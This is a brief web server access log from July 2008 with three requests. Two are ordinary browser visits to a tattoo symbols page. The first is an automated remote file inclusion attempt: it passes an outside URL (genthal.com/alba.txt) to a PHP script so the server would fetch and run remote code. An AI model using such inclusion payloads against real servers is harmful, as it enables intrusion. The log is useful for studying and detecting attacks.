160.99.12.231 - - [29/Jul/2008:02:55:09 -0500] "GET /logs/access_log.1214438400//include/write.php?dir=http://genthal.com/alba.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.65"
71.71.211.182 - - [29/Jul/2008:02:56:40 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
71.71.211.182 - - [29/Jul/2008:02:56:50 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1"
